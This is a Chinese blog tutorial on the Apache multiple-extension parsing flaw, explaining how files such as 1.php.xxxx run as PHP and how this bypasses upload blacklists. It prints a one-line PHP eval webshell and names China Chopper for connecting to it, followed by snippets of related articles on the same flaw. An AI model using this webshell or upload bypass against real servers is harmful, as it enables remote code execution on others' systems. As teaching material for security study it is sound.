Apache文件解析漏洞

最新推荐文章于 2024-06-04 10:03:12 发布
最新推荐文章于 2024-06-04 10:03:12 发布
阅读量384 收藏
点赞数
分类专栏: web安全 文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46370858/article/details/110142638
版权

1.Apache环境搭建
Apache 和 php采用 module的方式结合。
在这里插入图片描述
2.Apache解析漏洞介绍
因为Apache认为一个文件可以拥有多个扩展名,哪怕没有文件名,也可以拥有多个扩展名。Apache认为应该从右到左开始判断解析方法的。如果最右侧的扩展名为不可识别的,就继续往左判断,直到判断到文件名为止。
官方解释:http://httpd.apache.org/docs/current/mod/directive-dict.html在这里插入图片描述
3.解析漏洞利用演示
在站点目录下新建一个 1.php.xxxx文件,xxxx文件后缀名为无法识别的后缀名。其中内容为phpinfo();
在这里插入图片描述
4.利用场景介绍
在Web程序中存在文件上传,但是有黑名单验证时,利用该解析漏洞可以上传对应的Webshell到目标服务器。
上传一句话 <?php @eval($_POST[“cmd”]); ?> 用中国菜刀连接。
在这里插入图片描述

一米八多的瑞兹
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
apache文件解析漏洞
xdjxi的博客
03-07 469
.使用Docker搭建环境 1.首先拉取一个基础镜像 docker pull ubuntu:18.04 启动一个容器 docker run --name apachejs -itd -p 80:80 ubuntu:18.04 进入容器 docker exec -it apachejs bash 更换apt源 echo "deb http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe mul...
Apache文件解析漏洞-01
09-15
Apache文件解析漏洞-01 Apache文件解析漏洞是一种基于Apache服务器的文件解析机制中的漏洞,攻击者可以通过构造特殊的文件名来欺骗Apache服务器,导致服务器错误地解析文件类型,从而导致安全漏洞的出现。 Apache...
中间件解析漏洞Apache解析漏洞原理和复现
最新发布
A526847的博客
06-04 1288
在windows下,会直接根据最后的.来进 行分隔,将其判定为doc文件,但在apache中可不是这样的,apache会从后往前依次进行判别,遇到不 认识的后缀,便会往前读,如果还是不认识再往前,若是到最后一个都不认识,则会将该文件当成默认 类型文件读取。在2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,shell.php\x0A将被按照PHP后缀进行解析, 导致绕过一些服务器的安全策略。这种情况,多后缀的文件名中只要存在.php后缀,则就会将该文件当做php文件解析
文件解析漏洞——Apache文件解析漏洞
weixin_54055099的博客
09-22 903
Apache文件解析漏洞
Apache解析漏洞
热门推荐
weixin_44174581的博客
08-04 1万+
Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准) 1. 如图,最后一个后缀名为.xxx,不合法,所以向左看,.php为合法后缀,所以以.php格式解析,可用来绕过黑名单过滤 2.AddHandler导致的解析漏洞 如果服务器给.php后缀添加了处理器:AddHandler application/x-httpd-php.php 那么,在有多个后缀
apache不能解析php文件_Apache-解析漏洞
weixin_39960793的博客
11-12 257
大家好,我是阿远,今天给大家分享一下Apache解析漏洞的原理Apache解析漏洞Apache中,访问:liuwx.php.360会从右往左识别后缀,存在解析漏洞的时候,会从右往左识别哪个能解析,360是不能被解析,然后往左识别到php就识别能解析,这就是Apache解析漏洞漏洞复现环境Windows Server 2003_x64ApachePhpStudy提示:如果物理主机Ping不通20...
Apache后缀名解析漏洞分析和防御方法
09-15
Apache后缀名解析漏洞是一种潜在的安全威胁,能够被攻击者利用来上传恶意文件至服务器。通过理解漏洞原理和采取适当的防御措施,可以有效地降低被攻击的风险。维护良好的配置习惯以及及时更新补丁是保障Web服务器...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
2. **限制JSP文件解析**:在Tomcat配置中,可以禁用对特定目录的JSP文件解析,避免恶意文件被执行。 3. **输入验证**:在处理用户输入时,严格验证文件路径,拒绝包含特殊字符或可疑路径的请求。 4. **防火墙策略**...
文件上传漏洞的思维导图
04-19
7. **平台与服务器漏洞**:不同服务器平台(如IIS、Apache、Nginx)和内容管理系统(CMS)可能存在特定的解析漏洞,攻击者需了解这些漏洞并针对性地构造攻击。 8. **WAF(Web Application Firewall)绕过**:防火墙...
Apache文件解析漏洞详解
永远是少年
10-07 1478
今天继续给大家介绍渗透测试相关知识,本文主要内容是Apache文件解析漏洞详解。 一、漏洞简介 二、Vulhub漏洞环境启动 三、漏洞实战
Apache解析漏洞实验
m0_63645854的博客
09-12 637
本文主要介绍了如何利用Apache解析漏洞拿到网站的shell
Apache解析漏洞(一)
weixin_30917213的博客
01-21 227
500是服务器内部错误,说明是有文件Apache 漏洞之后缀名解析漏洞 我们都知道windows2003 + IIS6.0下,如果目录结构中有xxx.asp这样的目录,那么所有这个目录下的文件不管扩展名为什么,都会当作asp来解析。我们一般称这个漏洞为 windows2003+iis6.0目录解析漏洞。 但是大家可能不知道的是,apache服务器也存在类似的解析漏...
apache解析漏洞
大方子
07-25 3248
复现环境 win2003(x64) phpstudy2016 Apache/2.4.23 PHP/5.4.45 复现过程 ①.先在文件根目录,建立123.php内容为123 PHP解析正常 ②.再创建一个456无后缀的文件,内容为456 无后缀,但是apache还是解析为PHP ③.创建一个789.php.3...
Apache文件解析漏洞利用与场景示例
Apache文件解析漏洞-01是关于Apache Web服务器中的一项安全性问题,它涉及到Apache文件解析机制。Apache通常通过模块化的方式与PHP集成,允许处理不同类型的请求。然而,这个机制也存在一个潜在的安全漏洞漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一米八多的瑞兹

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值